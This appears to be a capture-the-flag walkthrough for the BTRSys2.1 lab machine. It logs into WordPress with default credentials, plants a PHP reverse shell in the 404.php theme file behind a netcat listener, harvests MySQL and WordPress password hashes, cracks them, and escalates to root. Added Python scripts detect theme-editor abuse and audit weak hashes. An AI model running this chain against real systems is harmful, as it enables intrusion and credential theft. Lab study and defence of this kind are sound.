# BTRSys2.1

## nmap

```
(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```

```
# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
|   256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
|   256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
```

Port 80 is open, so let's check `/robots.txt`.

<div align="left"><img src="/files/-Mi1YzEwmjGdV6Yw9uM1" alt=""></div>

## WordPress

You can see that `robots.txt` lists an interesting directory, `/wordpress`. Let's see if we can log in with default credentials, trying `admin` as both the username and the password.

<div align="left"><img src="/files/-Mi1Zi1YIJ_3DMeeZNPR" alt=""></div>

Looks like we were able to log in using those credentials.

<div align="left"><img src="/files/-Mi1_4r44lDRtHuaP8UY" alt=""></div>

## Initial Foothold

To get a reverse shell, set a netcat listener first.

```
(base) [psdon@arch BTRSys2.1]$ sudo nc -lvnp 80
```

Then go to the theme editor and set the payload.

<div align="left"><img src="/files/-Mi1_pjb4eG6KkEYUq3D" alt=""></div>

Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will use the `404.php` file.

<div align="left"><img src="/files/-Mi1aHV-k-R19B_Ggp2u" alt=""></div>

Edit the file, paste your payload and save. You can use this [PHP reverse shell payload](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php), or whatever you prefer.

<div align="left"><img src="/files/-Mi1aewC2Iyjh_gWYJ4B" alt=""></div>

Visit `/wordpress/wp-content/themes/twentyfourteen/404.php` and you should receive your shell in your terminal.

<div align="left"><img src="/files/-Mi1bLNBAQkRvywo4jRU" alt=""></div>

<div align="left"><img src="/files/-Mi1bkj-JWNB7bTSzfYs" alt=""></div>
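As an added example (not from this writeup), a small Python check a defender could run over Apache access logs to spot the write-then-execute pattern used above: a POST to `theme-editor.php` followed by a direct request for a theme `.php` file from the same client. The log lines are constructed for this example; the IPs and timestamps are made up.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache combined-format log lines that mirror the steps of this
# writeup: a wp-admin login, a save through the theme editor, then a GET of the
# edited theme template. Addresses and timestamps are made up for the example.
SAMPLE_ACCESS_LOG = """\
192.168.49.208 - - [26/Aug/2021:20:15:01 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.49.208 - - [26/Aug/2021:20:15:40 -0700] "GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen HTTP/1.1" 200 9120
192.168.49.208 - - [26/Aug/2021:20:16:05 -0700] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0
192.168.49.208 - - [26/Aug/2021:20:16:30 -0700] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 12
10.0.0.7 - - [26/Aug/2021:20:17:00 -0700] "GET /wordpress/ HTTP/1.1" 200 4100
"""

# Minimal parser for the common/combined log format fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_theme_editor_abuse(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per direct request for a theme .php file that comes
    from a client which earlier saved a file through the theme editor.

    Site visitors normally reach theme templates indirectly (WordPress includes
    them); a direct hit on /wp-content/themes/<theme>/<file>.php right after an
    editor save is the trigger pattern for a template that was replaced with a
    webshell, as in the 404.php step above.
    """
    last_editor_save: Dict[str, str] = {}   # client ip -> timestamp of last POST
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]   # drop the query string
        if rec["method"] == "POST" and path.endswith("/wp-admin/theme-editor.php"):
            last_editor_save[rec["ip"]] = rec["ts"]
        elif "/wp-content/themes/" in path and path.endswith(".php"):
            saved_at = last_editor_save.get(rec["ip"])
            if saved_at:
                findings.append({
                    "ip": rec["ip"],
                    "saved_at": saved_at,
                    "executed_at": rec["ts"],
                    "file": path,
                })
    return findings


if __name__ == "__main__":
    for f in find_theme_editor_abuse(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']} saved via theme editor at {f['saved_at']}, "
              f"then requested {f['file']} at {f['executed_at']}")
```

Setting `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php` removes the theme and plugin editor entirely, which closes this path even when admin credentials are known.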

## Post Exploitation

Let's check `wp-config.php`.

```
www-data@ubuntu:/var/www/html/wordpress$ less wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
```

There's a MySQL credential in the file; let's try to log in using `root` as the username and `rootpassword!` as the password.

```
www-data@ubuntu:/var/www/.ssh$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 64
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```

I found credentials inside the `wordpress` database.

```
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
| wordpress          |
+--------------------+
7 rows in set (0.01 sec)

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------------+
| Tables_in_wordpress        |
+----------------------------+
| wp_abtest_experiments      |
| wp_abtest_goal_hits        |
| wp_abtest_goals            |
| wp_abtest_ip_filters       |
| wp_abtest_variation_views  |
| wp_abtest_variations       |
| wp_commentmeta             |
| wp_comments                |
| wp_links                   |
| wp_masta_campaign          |
| wp_masta_cronapi           |
| wp_masta_list              |
| wp_masta_reports           |
| wp_masta_responder         |
| wp_masta_responder_reports |
| wp_masta_settings          |
| wp_masta_subscribers       |
| wp_masta_support           |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
+----------------------------+
26 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                        | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | root       | a318e4507e5a74604aafb45e4741edd3 | btrisk        | mdemir@btrisk.com |          | 2017-04-24 17:37:04 |                     |           0 | btrisk       |
|  2 | admin      | 21232f297a57a5a743894a0e4a801fc3 | admin         | ikaya@btrisk.com  |          | 2017-04-24 17:37:04 |                     |           4 | admin        |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.01 sec)
```

I have cracked the hashed `user_pass` of the root user using [crackstation.net](https://crackstation.net/).

<div align="left"><img src="/files/-Mi1gjjlzp43d-Oh9FK0" alt=""></div>

The password we have cracked is `roottoor`.
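The reason both the default login and the CrackStation lookup worked is visible in the dump: the `user_pass` values are 32 hex characters, i.e. unsalted legacy `md5()` hashes rather than WordPress' salted `$P$` phpass format, and WordPress still accepts such hashes at login. As an added example (not part of this writeup), a short Python audit that classifies each row's hash scheme and checks legacy MD5 rows against a tiny default-credential list; the rows are copied from the dump above, and `roottoor` is included only because the writeup reports it as the cracked value.

```python
import hashlib
import re
from typing import Dict, List, Optional, Sequence, Tuple

# (user_login, user_pass) pairs taken from the wp_users dump above.
WP_USERS_DUMP: List[Tuple[str, str]] = [
    ("root", "a318e4507e5a74604aafb45e4741edd3"),
    ("admin", "21232f297a57a5a743894a0e4a801fc3"),
]

# Tiny default-credential list an auditor checks first. "roottoor" is the value
# the writeup reports CrackStation returned for the root hash; the login name
# itself is always tried as well (see audit_wp_users).
DEFAULT_WORDS: List[str] = ["admin", "password", "123456", "root", "toor", "roottoor"]

LEGACY_MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def hash_scheme(user_pass: str) -> str:
    """Classify a WordPress user_pass value by its storage format."""
    if user_pass.startswith(("$P$", "$H$")):
        return "phpass"        # salted, iterated portable hash (WordPress default)
    if user_pass.startswith(("$2y$", "$2a$")):
        return "bcrypt"
    if LEGACY_MD5_RE.match(user_pass):
        return "legacy-md5"    # unsalted md5(); still accepted at login, trivially looked up
    return "unknown"


def match_legacy_md5(user_pass: str, words: Sequence[str]) -> Optional[str]:
    """Return the first word whose md5 equals the stored hash, or None."""
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == user_pass:
            return w
    return None


def audit_wp_users(rows: Sequence[Tuple[str, str]],
                   words: Sequence[str] = DEFAULT_WORDS) -> Dict[str, Dict[str, Optional[str]]]:
    """Per login: the hash scheme and, for legacy MD5 rows, which default word
    (or the login name itself) the hash corresponds to, if any."""
    report: Dict[str, Dict[str, Optional[str]]] = {}
    for login, user_pass in rows:
        scheme = hash_scheme(user_pass)
        weak: Optional[str] = None
        if scheme == "legacy-md5":
            weak = match_legacy_md5(user_pass, [login, *words])
        report[login] = {"scheme": scheme, "default_password": weak}
    return report


if __name__ == "__main__":
    for login, info in audit_wp_users(WP_USERS_DUMP).items():
        flag = "WEAK" if info["default_password"] else "ok"
        print(f"{login:8} {info['scheme']:11} {flag} {info['default_password'] or ''}")
```

Any account reported as `legacy-md5` should have its password reset so WordPress rehashes it in the salted format, and the `admin` row shows the hash is simply md5 of the username.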

## Privilege Escalation

Let's try to log in as root using the credentials we cracked above.

```
www-data@ubuntu:/var/www/.ssh$ su
Password: roottoor
root@ubuntu:/var/www/.ssh#
```

You are now root!
